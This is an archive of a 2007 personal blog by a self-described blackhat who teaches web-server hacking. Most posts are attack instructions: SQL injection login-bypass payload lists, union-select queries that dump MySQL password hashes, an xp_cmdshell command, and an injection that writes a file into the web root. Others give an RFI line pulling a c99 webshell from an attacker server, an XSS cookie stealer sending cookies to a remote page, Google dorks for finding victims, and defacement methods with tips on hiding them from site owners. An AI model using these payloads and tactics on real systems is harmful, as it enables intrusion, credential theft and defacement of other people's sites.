And this is the best text i got today from a friend who got my number:

Birth is a "START OF LIFE" beauty is a "ART OF LIFE" love is a "PART OF LIFE" Death is a "LAST OF LIFE" But friendship is a "HEART OF LIFE" happy birthday 2 Chuks.

Thanx for the support over the years guys. All the best this Saturday, bye.

/Chuks

THE XXS SCANNER DOWNLOAD

2007-07-02T15:53:00.000+03:00

Hi,

U can download the script here, if u didn't find it:

http://41.206.42.174/chuksjonia/tools/xxs.py

Its written in Python, so just compile it.

/Chuks

DEFACING SITES [Methods]

2007-06-30T20:55:00.000+03:00

Method 1 - Content replacement.

Using the existing server host, web server etc, replace the pages with defaced ones.
- Prerequisite: own the server
- To undo: delete the defaced pages and replace original ones.

Method 2 - Web server software reconfiguration.
Using the existing server host and web server, reconfigure the web server to serve
documents out of a different (possibly hidden) directory. For an added bonus, change
permissions etc, to make it marginally harder to change back.

Method 3 - Web server software replacement.
Destroy or disable the original web server, and replace it with another one, hidden
possibly as a trojan in existing system programs - ensure that this starts up before
any legit web server, thus rendering the original web server useless.

Method 4- Better web server software replacement.
Destroy or disable the original web server, and trojan system programs, and/or make
subtle configuration changes, or low-level network stuff, which causes
defaced web pages to be served one way or another, by the machine. Take any other steps
to ensure that it cannot be easily undone.

For bonus points, put network firewalling / NAT in, such that the creators / owners of the
web site still see the real site, but everyone else sees the defaced site.

Method 5 - Rerouting.
Ignore the original web server and compromise a nearby router. Add a NAT rule such that
web traffic gets rerouted to another machine where the defaced pages are served.

Method 6 - DNS hijacking.
compromise the DNS. The higher level the better. Ideally compromise a top-level DNS and insert
a fake A record in, at the root servers. Ideally point this to a network of zombie machines
(using round-robin DNS), which are all in different countries.

Method 7 - Backbone routers.
Compromise backbone routers and inject phoney IP routes to route traffic to the web site
to a (network of) owned server(s).

Method 8 - Browser compromise.
Compromise the distribution system of several major web browsers, and install backdoors
which cause the web site to appear to be defaced

Method 9 - ISP compromise.
Compromise several major ISPs, either trojanning their install CDs, subvert their routers,or do several of the above.

Method 10 - Some subtle combination of any of the above.
Especially effective would be 1,2,4,5 and 6 for instance.

A determined attacker would carry out all the compromises necessary for 1,2,4,5 and 6 ahead of time,set up zombies to serve various pages, and set all the triggers on the same time bomb.

All five of the methods would then need to be independently repaired (ok, 1,2 and 4 could be done at the same time) to fix it.

Methods 7,8 and 9 are hopefully so difficult that they're not a real threat.

Be Protected Methods.

Tips : Be Stealthy
Create IP rules or firewall rules which causes the defacement to be invisible to the site's creators, owners, or maintainers.

Tips : Be Stealthy
Create time based rules to cause the defacement to be visible only during times of day when the site's creators, owners etc, are likely to be asleep

Tips : Be Stealthy
Create IP rules which ONLY make the defaced pages available to robots, so that the defaced pages end up in Google's cache, Internet Archiver etc.

Tips : Be Stealthy
Create user-agent specific rules which make the defacement only visible to users of certain browsers / operating systems. For instance, make the defaced pages only visible to users of Windows 98 or ME, as businesses rarely use these (and sysadmins
and web designers never use them)

/Chuks

Credits to my fellow friend, MuRd3rp0L!c3

AN ATTACK WITH CROSS SITE SCRIPTING

2007-06-22T17:44:00.000+03:00

CROSS SITE SCRIPTING ATTACKS

Well, this is a simple example of an XSS vulnerable site. Its displays my cookie when i initiate document.cookie. If u know what i mean by cookies, then u will understand that, u can edit cookies too. Lets explain more on this below. Note, no beef with the site owners, just an example.

For some months i have been studing more on Cross Site Script (XSS) and i think i need to post this. I posted a zero day XSS scanner some time last week, if u didn't get a glimpse of it, i can always do that later.

ABOUT THE SCANNER

-Well that scanner, should get you going when looking for Targets u wonna work out this weekend. Using Google Queries is always the best way to hack with, we always say google is the best teacher, and the best hack tool ever exposed to the public, that is more than 60% accurate.

I'm not the author of code, its done by a good friend, i spend time with google, so i dont need a code to pick XSS vulnerable sites.

Anyway for starters, its good to know how to use tools before u get all blackhat and start picking targets with google or mouse pointers, hehehe.......... I'm Blackhat, i do alot underground stuff, read the manifesto, but they will never get near me, since i leave no trace.

THE SCANNING PHOTOS

Lemmie upload some photos of what the scanners can do.

So we are going to discuss the following

a) Cookie Stealing
b) Javascript Injection
c) Xss in general and how to apply the attack

What Is a Cookie?

A cookie is a sensitive piece of data. You see once you go to a site and sign up a cookie is set to remember you. A cookie just holds data that the site can check that you have and see if youve been there before, if you have then it checks to see if the user and password are correct then logs you in. Picture your at a night club and you buy a ticket and they give you a band. So you can go in and out (so you dont have to rebuy a tickey) Cookies go much farther then that as you can see. Night Clubs remember you for one night. Cookies can remember you for ever.

Alerting & Spoofing

So you know what a cookie is... now how to you see them? Actually cookie editing is one of the most simple method. You see as long as you have a browser you can view and edit cookies, just with basic JavaScript(JS) skills. Load up your browser and go to the site... login... nowtype javascript:alert(document.cookie) and you should see a user and password (which is yours) If you don't thats ok! Most sites now a days don't use cookies... but use sessions... Sorry sessions can't be edited (they can) but not like cookies, once you edit a cookie you can spoof yourself (username and password) Now let's begin to spoof... Ok say you alerted the cookie and saw something like this...

strusername=Chuks;strpassword=danger

Now say you know 'kenya' is a admin and you don't know his password... due to weak security you don't need a password javascript:void(document.cookie="strusername=kenya") Now type javascript:alert(document.cookie) !!! Heh welcome kenya That's pretty much all to Cookie Editing. Do more research on that, i aint doing it for u.

What Is XSS?

XSS, or CSS, whatever you perfer to call it, XSS (CSS) stands for Cross Site Scripting. Basically that means you inject script any kind, to make it do whatever you want... Depends what you inject will depend on the outcome. With XSS you can also steal input. Such as user names passwords and cookies. This will all be discussed so will many examples and this article should help you get creative with XSS.

With XSS you can execute any type of script on the client and the server. XSS isn't just executing script, but also stealing input. You setup XSS to grab the input and post it on your site in a secret file! This isn't all that XSS can do. Xss can also steal cookies. Cookies hold valuable Information such as user / passwords etc...

So there was this question, the file output that the stealer script picks and pastes at the evil server with the cookies, could there be a google dork, that can help search for these outputs? Good Question, right? Hehehehe..............

Cross site scripting seems to be the future of web attack and new techniques develop every day. Good read. Will edit more later, since this was written in a Hurry and i havent explained more on the attack too, so hold on, atleast i did an Introduction.

/Chuks

THE MOST USED METHODS TO PENETRATE A WEBSERVER.

2007-06-12T16:31:00.000+03:00

* This tutorial is destined to increase your knowledge in internet security, penetrating web-servers;
* This document was prepared for informational purposes only;
* This document can not be multiplied without the authors permission.

Respects to my friend, flow-flow, for the German paper on the same.

Hackers Manifesto
I am here to exploit, to learn how thinks work.I’ve always put questions and I have always seeked for more than two hours.My crime is one of coriousity, I exploit what you dream of I am over ambition and will. If you want to enter this world , break away ,forget all you have learned from the others ,the ignorants ,those without interest and learn to do exactly what you want with your knowledge.
I’m in the underground for 5 years ,from my first contact with the computer since 10 years ago ,I was fascinated from the first moment of the infinite possibilities that it opens for a man.
You don’t know me ,so don’t judge me ! ONLY GOD can judge me !
If you feel something reading these lines, that means that I am talking to you, if not look away.
We have to help each other, hacking can not be defind ,hacking is a state of mind.
I thank all of you that helped and help me !
This is my manifesto !

The tutorial will be structured in two directions : vulnerabilities and fixing them.

A lot of people are making tutorials but they just talk , i am going to really explain a few methods as we go. I don’t consider myself a specialist but i know what i am talking about.

SQL-INJECTION

Sql injection is the method that exploits the errors from the code applications and it allows the attacker to inject SQL commands in the login forms ,feedback forms with the purpose to obtain access to sensible information from the data base.SQL Injection has effect because the imput forms allow SQL expressions to penetrate directly in the data base.
Building programes with SQL to manipulate the commands from the data base and so getting access.The most used is SQL login bypass,through which we inject in the login and password fields.

Example ‘ OR 1=1—
URL scheme: http://site.com/index.php?id=0 ‘ OR 1=1—
Other comands : admin’—
‘ OR 0=0—
“ OR=0—
OR 0=0—
‘ HI OR 1=1—
" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

We look for vulnerable sites with the following google-dorks :
”admin\login.asp”
”login.asp

How to defend yourself from such attacks.
The system must be checked for any sort of vulnerability ,the codes need to be bug free and the applications and all that means infrastructure must be satinized.
At each change of the components it must be done a web security audit.
It has no sense for me to get in any more detailes. If you don’t have a complex infrastructure that you have to take care of it isn’t forth for you to get more involved that you already are.

SQL Injection table modification

Here’s what we are going to do.
We are going to create an account with special rights.This method involves 3 steps : the generation of an error that must be understood ,it is important to see a certain table name ,after that we are going to inject commands to create an new privilegeate account.

At the username : ‘ HAVING 1=1
The error must contain a table name : user_member.id .
Then the injecting of the commands : ‘UNION SELECT * FROM user_member WHERE USER_ID=’ADMIN’ GROUP BY USER_ID HAVING 1=1;--
After the error is generated we try :
‘INSERT INTO USER_MEMBER(USER_NAME,LOGIN_ID,PASSWORD,CREATION_DATE)VALUES(‘HACKER’,’HACKED’,’HCKED’,GETDATE());--

Now if everything went well we shold be able to log in with :
-user : hacker
-password : hacked

REMOTE FILE INCLUSION

In this method what we actually what to do is upload a file ,a shell emulator on the web page, the vulnerable web page.When the web site calls another page to be displayed we will build a URL scheme, we will upload the emulator,getting access to the entire server.
This method is much more than this ,this is only a form of it so read further more and more tutorials.
Here is a couple of google-dorks to find vulnerable web sites :
: inurl :”index.php?page=”
includes/header.php?systempath=
/Gallery/displayCategory.php?basepath=
/index.inc.php?PATH_Includes=
/nphp/nphpd.php?nphp_config[LangFile]=
/include/db.php?GLOBALS[rootdp]=
/ashnews.php?pathtoashnews=
/ashheadlines.php?pathtoashnews=
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
/demo/includes/init.php?user_inc=
/jaf/index.php?show=
/inc/shows.inc.php?cutepath=
/poll/admin/common.inc.php?base_path=
/pollvote/pollvote.php?pollname=
/sources/post.php?fil_config=
/modules/My_eGallery/public/displayCategory.php?basepath=
/bb_lib/checkdb.inc.php?libpach=
/include/livre_include.php?no_connect=lol&chem_absolu=
/index.php?from_market=Y&pageurl=
/modules/mod_mainmenu.php?mosConfig_absolute_path=
/pivot/modules/module_db.php?pivot_path=
/modules/4nAlbum/public/displayCategory.php?basepath=
/derniers_commentaires.php?rep=
/modules/coppermine/themes/default/theme.php?THEME_DIR=
/modules/coppermine/include/init.inc.php?CPG_M_DIR=
/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=
/coppermine/themes/maze/theme.php?THEME_DIR=
/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
/myPHPCalendar/admin.php?cal_dir=
/agendax/addevent.inc.php?agendax_path=

We test on : http://site.com/director_vulnerabil.php?=http://google.com ,if the page opens in google in the site frame then it is vulnerable.

LOCAL FILE INCLUSION

A code problem can have serious consequencies ,this method is similarily to CGI Exploitation. Lets say i have access the password folder from the UNIX server. Simple ,anyone can do this kind of stuff ,after a scan of a site and POC ! then great hacker.This is lame stuff ! never use a scanner ,only if you have to ,or you are interested in a particular thing at the site.
At every vulnerability you have to understand the problem ,the code that generates it and so on.
Here is an example of an error :

$page input is not satinized.

The content is crypted ,but you can try with the bruteforce method using a program such as Brutus, will publish a perl code soon.I searched for passwords of FTP accounts for instance.It depends on your luck to.

URL scheme used : http://kleenrite.net/index.php?Tab=Renting&incFile=/etc/passwd

REMOTE ADMIN FILE DISCLOSURE

You try this more ‘blind’ in general because we don’t know for sure if it will work every time.
Remote Admin Password Disclosure,we try to acces folders from the inside.

URL scheme : http://www.site.com/files/uploaded/download.php?filename=download.php
I have posted alot of examples on other sites where I have found some serious info like passwords and so on. Here it isn’t such a big deal.

CROSS SITE SCRIPTING

It is in a state of research and it is the future some say ,well I am going to present how you can find this vulnerability and how you can exploited but as I said at RFI you have to study seriously if you want to really understand.
More exactly I’m going to refer to cookie stealing. For the test you proceed similarly as in SQL Injection.You look in forms and you try to inject simple scripts like : .The result is a alert window with the text “xss”, good now you know that you can try a more complex script.We will build a cookie stealer and I will show you how you can look for cookies directly from an URL scheme.
After we test it like so : script>alert(‘XSS’) we do the following:
window.location=’http://site.com/carie.php?cookie=’+’document.cookie;

NULL BYTE-CGI EXPLOITATION

CGI (or Common Gateway Interface) is a file that it is found on web servers and it gives control at cgi and pl files.The CGI scripts and folders are used for statistics ,forms and data base commands.NULL byte is used in programming and it says the end of a string.The CGI page acceses other pages like so :
Index.cgi?pageid=2
Here page2.html is shown but if we modify a little like so :
Index.cgi?pageid.cgi%00
We just added NULL byte and it comes to the end all the data in the URL. Now we do the following scheme :
Index.cgi?pageid=/etc/passwd%00

Almost seems like LFI.

DIRECTORY TRANSVERSAL

Directory Transversal is an HTTP exploit and it allows the attacker to access folders from the inside the server and to execute commands from the server’s root.

· Access Control Lists (ACLs)
· Root directory
These are two security protocols used on a server. In Access Control Lists the administrator puts limits on users and configures all the other functions. Root directory stops users to access files that contain sensibile data like CMD on the Windows platform and passwd folder on Linux/UNIX.
http://site.com/show.asp?view=../../../../../Windows/system.ini The URL scheme makes a request to the show.asp page from the server and sends the view parameter with the value
=../../../../../Windows/system.ini .
../ represents the director we go one folder up.
Another scheme would be : http:/site.com/scripts/..%5c../Windows/System32/

Hope this helps all of you, its an easy into to Web Application Security.

See u soon,

/Chuks

PHOTOS FOR THE CEH, FIVE MODULE TRAINING

2007-06-07T19:32:00.000+03:00

Well, i had promised i will upload the videos for the conference done a little while, but, i will have to postpone that to next week. Today i will upload the some photos for the classes, i trained on CEH. Well, none of the photos i am displayed, so dont look for me, hehehehe.......

1.One of the students tries to get a glimpse of what is going on when a shell pops up.

2.Some of the students who attended.

That all for now,

Cheers

/Chuks

CHUKSFIRE SQL INJECTION TOOL

2007-06-06T20:41:00.000+03:00

I have been busy scripting a tool that can crawl servers looking for Vulnerable pages which can be exploited using sql-injection. Its written in perl, called chuksfire. I will be lauching it soon, i will not name the day. I'm still working on the code, but its at its BETA stage at the moment. Been busy training, thats why its not out yet. I will try probe wananchi.co.ke, i will not display the vulnerable lines, though, but one thing u need to know, sql injection, can get your network compromised. This is how it works:

Starting chuksfire scan...

[*] Server: Apache/1.3.33 (Darwin) mod_jk/1.2.4 DAV/1.0.3 mod_ssl/2.8.24 OpenSSL/0.9.7i PHP/4.4 .1 mod_perl/1.26
[*] Checking robots.txt...
[*] Checking 1 page on www.wananchi.co.ke for SQL injection holes...
[*] Checking index.php...
[*] Checking for possible bugs...

I will try see if, i can add up some CMS bugs in the code, so as to pick known sql-injection vulnerabilities, on well used CMSs, like Joomla, XOOPS and others.

Good reading.

/Chuks

HACKERS CODE

2007-06-06T20:35:00.000+03:00

The Code

Hackers share and are willing to teach their knowledge
Hackers are skilled. Many are self-taught, or learn by interacting with other hackers.
Hackers seek knowledge. This knowledge may come from unauthorized or unusual sources, and is often hidden.
Hackers are tinkerers. They like to understand how things work, and want to make their own improvements or modifications.
Hackers often disagree with authority, including parents, employers, social customs and laws. They often seek to circumvent authority they disagree with.
Hackers disagree with each other. Different hackers have different values, and come from all backgrounds. This means that what one hacker is opposed to might be embraced by another.
Hackers are persistent, and are willing to devote hours, days and years to pursuing their individual passions.
This Code is not to prescribe how hackers act. Instead, it is to help us to recognize our own diversity and identify.
Every hacker must make his or her own decisions about what is right or wrong, and some might do things they believe are illegal, amoral or anti-social to achieve higher goals.
Hackers' motivations are their own, and there is no reason for all hackers to agree.
Hackers have a shared identify, however, and many shared interests.
By reading this Code, hackers can recognize themselves and each other, and understand better the group they are a part of. This will be beneficial to all hackers.

See u soon in Hack Dejavu, this Saturday for VIP at my security forum/mailist, the same spot, Igundas Place.

Good day.

/Chuks

THE IT SECURITY CONFRENCE ARRANGED BY FUTURISTIC

2007-06-02T18:18:00.000+03:00

Hi.

As most of u already know, we had the first, IT security Confrence in Kenya at Mid last month. Though we didnt cover much as expected, but hope we did a good show, and people got introduced to I.T. Security and got learn how to use a small holes to compromise the whole Server or Host.

I'm sure most of u got amazed when i used a tool like metasploit and got hold the desktop of someone who is logged in. Actually, hacking with metasploit and seizing up desktops, is not so leet, mostly there are more complicated hacking styles, where u install a good connect back and no one will know u are connected or logged in. By that we use Backdoors or Rootkits. I demostrated how to use Remote File Inclusion and how to find it, in vulnerable sites, and thats where jaws dropped since you could browse the system files for the victim. "Are we already in someones Server" u would ask.

Anyway hope to meet you for the upcoming CEH full course, which i will personnally train, and we will go through the 22 modules.

Hope to see u soon, i will post up at my forum.

Good Read.

/Chuks

SQL COMMANDS, ALSO USED FOR COMPROMISE

2007-05-15T14:34:00.000+03:00

Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions too
On theirr own they wont exploit anything but eventually you will find an exploit that needs these and they are good to know, for injection or just to better understand how SQL works.

ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transaction
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database

/Chuks

ANSWERING THE QUESTIONS ON SQLINJECTION AND BUILDING IN AN RFI SCRIPT IN HOUSE

2007-05-10T14:10:00.000+03:00

These are on the comments and previews done, so i will try explain the way i can best about it.

They best way to defend it is to have port 3306 filtered.....(check that server, top goverment but one of the most insecure) mail me if u need the ip.

slax ~ # nmap -sS -P0 XXX.XXX.XXX.XXX

Starting Nmap 4.03 ( http://www.insecure.org/nmap/ ) at 2007-05-10 12:02 EAT

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
143/tcp closed imap
443/tcp open https
631/tcp closed ipp
3306/tcp open mysql
10000/tcp closed snet-sensor-mgmt

.........and have the latest Kernel patch in your Box. Aslong as an RFI bug may be in yah site, or lets say your CMS, a knowledgable hacker will still get thru, so even a strong password wouldn't be a big deal if he is browsing your server on Port 80. The only thing that really helped last year from these kind of attacks was to have yah php safe_mode ON (secure) but these days there are so many ways of bypassing it, Lol!

This was well shown after the month of PHP bugs, January and Feb this year after the release of alot of POCs to the public by Hardened PHP and other communities.

To all, the best way to secure yah BOX, is to know how an intruder will get thru, by doing all types of Pentest Attacks, whether Black Box or White Box penetration testing.

Something else, before i go, SQL INJECTION, can help an attacker to build up an RFI attack on a server, by tring an injection where he is able to browse files: load_file('etc/password') and create his RFI by crafting an injection like:

www.site.com/vulnerablescripts.php?id=-1+union+select
+',1,2,3,4+from+mysql.user/**/into/**/outfile/**/'/home
/www/public/http/vul.php'/*

So we will have another file in the server named vul.php, which will have a straight rfi bug.

So remote include with a c99shell,or c100, r57 and other privated moded webshells.

www.site.com/vul.php?cmd=http://evilserver/c99.txt

Just a simple one, though there are more complex ones that needs alot experience.

Tried to explain in Example.

/Chuks

INJECTIONS, ATTACKING ASP LOGIN PAGES

2007-04-28T22:23:00.000+03:00

Hi,

I have been looking into alot of attacks, especially the shopadmin, on the login pages and other sites using different CMS and running ASP.NET, and i have seen that most of the sites especially hosted by the ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this articles, i will share with you some logins attemps, an attacker will use, try with and gain administration.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a

Username : admin
Password : admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--

Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --

username = admin' or '6'='6

' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail, incase u find these helpful.

Good weekend,

/Chuks

SQL INJECTIONS

2007-04-18T12:46:00.000+03:00

This is a vulnerability alot of hackers use, when attacking webservers. By webservers in mean, applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about sql injection, there ara alot of white papers on the net that can really help. See these pages,

http://www.acunetix.com/websitesecurity/sql-injection.htm

http://www.securiteam.com/securityreviews/5NP011FIUG.html

http://www.securiteam.com/securityreviews/5IP030K8AA.html

http://unixwiz.net/techtips/sql-injection.html

http://www.owasp.org/index.php/PHP_Top_5

And many others online

lets take an example on php, aite?

Let say our site is www.sitevulnerable.com/index.php
Index php is vulnerable to sql injection. So how would we attack. www.sitevulnerable.com/index.php?id=-1

Maybe u are asking me why 1, you can use any number 1010101, wateva

The inject above may give an error, and actually these errors are the one i will use to pick up passwords, tables etc.

So we go on by enumerating the tables

www.sitevulnerable.com/index.php?id=-1 union select 1/*

We are using /* to close the query so as to grep in db.

So we will continue adding up like this until we get an output that will help us.

www.sitevulnerable.com/index.php?id=-1 union select 1,2/*

Remember with this we are just grep db of id 1, which probably is root

www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*

and then i get an error like

3

1

We are still rolling........

So i will inject a crafted query like this

www.sitevulnerable.com/index.php?id=-1union select 4,DATABASE(),2,USER()/*

And the error i get will be the user name in the DB.

root@localhost

So lets grep the password from the db

www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*

And our error is

localhost

500372d40e775a87

Now that is an encrypted mysql hash, which can be bruteforced by using john the ripper.

Download from here

http://www.openwall.com/john/

So if i get the password, how will i log in to db and upload my files?

Simple, get a running shell, like c99shell, c100, r57 etc etc, they are all over the internet

A simple screenshot is done below.

Hope this helped, signing off,

/Chuks

EXPLAINING CONTENT MANAGEMENT SYSTEMS

2007-04-17T17:53:00.000+03:00

A content management system is an application that is accessed with a webbrowser (mozilla firefox, Opera, konqueror etc) over a network like Internet or through the intranet. We actually call them webapplications.and thats where we start talking about webapplication security.

We use these webaplications for webmails, online retail sales, online auctions, wikis, weblogs, discussion boards(forums) and alot of others.

Content Management System simplifies the work of the administrators on a site, when it comes to stuff like editing processes, creating, translations, publishing, archiving and alot more better services.

Errors and bugs found are released everyday including hacked frameworks, new and zero day exploits, and people are made aware of them and patches released. To learn more about webapplication security, you can check www.webappsec.org, a site i always visit several times a day. Others are like www.owasp.org, www.spidynamics.com, www.acunetix.com, www.cgisecurity.com

Most of the Content Management Softwares i know of, are opensource, so free for anybody who wants to have a website which really sings..........

/Chuks

LOCAL FILE INCLUSION

2007-04-12T10:27:00.000+03:00

LOCAL FILE INCLUSION

Local file inclusion is when you view 1 of the remote systems local files through one of their web based scripts normally, e.g. victimsite.com/vulnerablescript.php?script=../../../../../../../etc/passwd? which if on a unix/Linux system will bring up the passwd file.

Its normally found in webapplications who's input isn't sanitised properly.http://www.victim.com/vulnerablescript.php=2

Now this is like a GET parameter request for 2 on the above URL. Lfi works with the following

- Nullbytes: %00
- Directory transversal: /../

Lets assume the vulnerable script looks as this;

$file=$_GET["file"]; //Get parameter
include(".vuln/$vulnerable.php") //include Get parameter with folder prefix
?>

As we all know, the GET parameter is passed to the include fuction, which then loads the file, linking up to the full path; /home/www/anotherfile/application/vulnerablescript.php

Even, as far as PHP is concerned, it has a way of allowing upload of files to the box template folder, which will turn from LFI to RFI. RFI is a short name of Remote File Inclusion. This will happen if allow_url_fopen is enabled, which due to these vulnerabilities, it will be disabled in PHP 6. You can read more about uploading in php here, http//au.php.net/manual/en/features.file-upload

So to check if our exploit works we load up the vulnerable script up the url, and feed in a LFI, check this out.....

www.victimsite.com/vulnerablescript.php=../vulnerablescript.php

......and if it reloads, the site is vulnerable to LFI

What will happen in the background is something like this

/home/www/anotherfile/application/vuln/../vulnerablescript.php

Now this is a simple directory transversal

Nullbytes come into play if .php is closed up to the file and helps to ignore everything except %00, so if u do vulnerablescript.php%00, everything after .php is ignored.

Remember most of our sites have so many security holes u would be amazed, especially if the box is in the same LAN the company or the institution is. Another way of acting gone in 60 seconds huh!

The screenshot below shows an LFI.

Will be writing more soon on websecurity.

/Chuks

IT SECURITY IN MY COUNTRY

2007-04-11T16:23:00.000+03:00

Hi.

In my country computer security is not much of an issue, as far as Administration is concerned. You will find how simpler to break in and how Vulnerable big companies and Goverment institution networks are. So i wish to use this blog to address I.T security and Websecurity as a whole. How far a rabbit hole can be and a little on Exploits and Vulnerability as a whole.